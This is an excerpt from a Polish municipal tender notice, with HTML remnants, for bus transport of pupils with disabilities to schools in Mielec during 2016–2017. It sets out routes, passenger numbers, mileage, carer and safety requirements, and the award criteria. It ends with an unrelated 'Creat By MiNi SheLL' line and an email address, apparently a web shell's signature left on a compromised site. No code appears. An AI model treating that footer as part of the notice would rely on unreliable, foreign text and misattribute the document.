Dowóz uczniów z niepełnosprawnościami do Zespołu Szkół Ogólnokształcących nr 1                             w Mielcu przy ul. Tańskiego 3 obejmuje 12 osób (1bus/autobus przystosowany do przewozu osób niepełnosprawnych), w tym 11 uczniów niepełnosprawnych poruszających się samodzielnie oraz 1 opiekuna dowozu. Przebieg dzienny środka transportu przewiduje się na ok. 45 km. Łączny dzienny przebieg to ok. 189 dni roboczych w okresie realizacji zamówienia.  
Wymagania dotyczące sposobu realizacji zamówienia:
1)	godziny przejazdów (dojazd i powrót) od poniedziałku do piątku w dni nauki szkolnej zostaną określone przed 1 września 2016 r. przez ZSO nr 1,
2)	odbiór uczniów będzie następował z wyznaczonych miejsc (szczegółowy wykaz uczniów 
z niepełnosprawnościami objętych dowożeniem z domu do szkoły i z powrotem, zawierający dokładne dane adresowe zostanie przekazany Wykonawcy przez Naczelnika Wydziału Edukacji Urzędu Miejskiego w Mielcu po rozstrzygnięciu przetargu i po podpisaniu umowy), 
3)	nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkół do domu osobom nieupoważnionym,
4)	Zamawiający, w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia ilości dowożonych uczniów maksymalnie do 50 % ogólnej liczby dowożonych,  tj. o 5 uczniów, bądź ich zmniejszenia o ok. 3 uczniów,
5)	opcja zwiększenia ilości dotyczy dowożonych dzieci na trasie dowozu do ZSO nr 1 
w Mielcu w okresie od 1 września 2016 r. do 30 czerwca 2017 r. i będzie miała zastosowanie   w przypadkach zgłoszenia przez rodziców - opiekunów nowych dzieci do dowozu w trakcie trwania roku szkolnego 2016 - 2017; Zamawiający zwiększając ilość dzieci objętych dowozem, przekaże stosowną informację Wykonawcy usługi,
6)	w przypadku zmian liczby dowożonych uczniów Wykonawca zobowiązuje się do dowożenia uczniów, zgodnie z przedstawionym mu nowym wykazem, z co najmniej 
3 -dniowym wyprzedzeniem,
7)	zaleca się przeprowadzenie wizji lokalnej dotyczącej ustalenia tras dowozu, 
w szczególności sprawdzenie ilości kilometrów w celu uzyskania informacji koniecznych do przygotowania oferty. Koszty wizji lokalnej ponosi Wykonawca,
8)	Wykonawca samodzielnie ustali najkrótsze i bezpieczne trasy dowozu dzieci, 
a Zamawiający po przeprowadzonej analizie dokona jej akceptacji,
9)	w oferowanych środkach transportu należy zapewnić miejsce siedzące dla opiekunów dowozu,
10)	czas trwania dowozu/odwozu dla poszczególnego dziecka nie może przekroczyć 1 godziny 15 minut,
11)	nie dopuszcza się przesadzania dzieci w trakcie dowozu do innego pojazdu,
12)	opiekunów do przewożonych uczniów z niepełnosprawnościami zapewnia Gmina Miejska Mielec,
13)	Wykonawca będzie zobowiązany do prowadzenia w każdym dniu pracy notatki z licznika odnośnie przebytych kilometrów dziennego przebiegu i przedstawiania  comiesięcznie pod fakturę zestawienia zbiorczego z faktycznie przebytych kilometrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności rachunku/faktury VAT - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2   
Dowóz uczniów z niepełnosprawnościami do Szkoły Podstawowej nr 11 w Mielcu - trasa nr I oraz do Specjalnego Ośrodka Szkolno - Wychowawczego w Mielcu - trasa nr II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2   
Dowóz uczniów z niepełnosprawnościami do Szkoły Podstawowej nr 11 w Mielcu - trasa nr I oraz do Specjalnego Ośrodka Szkolno - Wychowawczego w Mielcu - trasa nr II.

Trasa nr I dotyczy przewozu uczniów do Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Mielcu przy ul. Warneńczyka 2. Liczba osób do przewozu na tej trasie to   27 osób (1autobus niskopodłogowy), w tym 25 uczniów z niepełnosprawnościami poruszających się samodzielnie oraz 2 opiekunów dowozu - nauczycieli SP nr 11 w Mielcu. 
Trasa nr II dotyczy przewozu uczniów do Specjalnego Ośrodka Szkolno - Wychowawczego w Mielcu przy ul. Królowej Jadwigi 1. Liczba osób do przewozu na tej trasie to 42 osoby (2 autobusy niskopodłogowe), w tym 1 uczeń z niepełnosprawnościami  poruszający się na wózku inwalidzkim, 37 uczniów z niepełnosprawnościami poruszający się samodzielnie, 4 opiekunów przewodu (po dwóch na 1 autobus). 
Łączny przebieg dzienny środków transportu na trasach I - II (3 autobusami niskopodłogowymi) przewiduje się na około 155 km. Łącznie jest to 189 dni roboczych 
w okresie realizacji przedmiotu zamówienia.

Wymagania dotyczące sposobu realizacji zamówienia:
1)	godziny przejazdów (dojazd i powrót) od poniedziałku do piątku w dni nauki szkolnej określą przed 1 września 2016 r. odpowiednio SP nr 11 i SOSW w Mielcu,
2)	odbiór uczniów będzie następował z wyznaczonych miejsc (szczegółowy wykaz uczniów z niepełnosprawnościami objętych dowożeniem z domu do szkoły i z powrotem, zawierający dokładne dane adresowe zostanie przekazany Wykonawcy przez Naczelnika Wydziału Edukacji Urzędu Miejskiego w Mielcu po rozstrzygnięciu przetargu i po podpisaniu umowy), 
3)	nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkół do domu osobom nieupoważnionym,
4)	Zamawiający, w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia ilości dowożonych uczniów maksymalnie do 20 % ogólnej liczby dowożonych,  tj. o 13 uczniów, bądź ich zmniejszenia o ok. 10 uczniów,
5)	opcja zwiększenia ilości dotyczy dowożonych dzieci na trasie dowozu do  
SP nr 11 i SOSW  w Mielcu w okresie od 1 września 2016 r. do 30 czerwca 2017 r. i będzie miała zastosowanie   w przypadkach zgłoszenia przez rodziców, opiekunów nowych dzieci do dowozu w trakcie trwania roku szkolnego 2016 - 2017. Zamawiający zwiększając ilość dzieci objętych dowozem, przekaże stosowną informację Wykonawcy usługi,
6)	w przypadku zmian liczby dowożonych uczniów Wykonawca zobowiązuje się do dowożenia uczniów, zgodnie z przedstawionym mu nowym wykazem, z co najmniej 
3 -dniowym wyprzedzeniem,
7)	zaleca się przeprowadzenie wizji lokalnej dotyczącej ustalenia tras dowozu, 
w szczególności sprawdzenie ilości kilometrów w celu uzyskania informacji koniecznych do przygotowania oferty; koszty wizji lokalnej ponosi Wykonawca,
8)	Wykonawca samodzielnie ustali najkrótsze i bezpieczne trasy dowozu dzieci, 
a Zamawiający po przeprowadzonej analizie dokona jej akceptacji,
9)	w oferowanych środkach transportu należy zapewnić miejsce siedzące dla opiekunów dowozu,
10)	czas trwania dowozu, odwozu dla poszczególnego dziecka nie może przekroczyć 1 godziny 15 minut,
11)	nie dopuszcza się przesadzania dzieci w trakcie dowozu do innego pojazdu,
12)	opiekunów do przewożonych uczniów z niepełnosprawnościami zapewnia Gmina Miejska Mielec,
13)	Wykonawca będzie zobowiązany do prowadzenia w każdym dniu pracy notatki z licznika odnośnie przebytych kilometrów dziennego przebiegu i przedstawiania  comiesięcznie pod fakturę zestawienia zbiorczego z faktycznie przebytych kilometrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności rachunku/faktury VAT - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com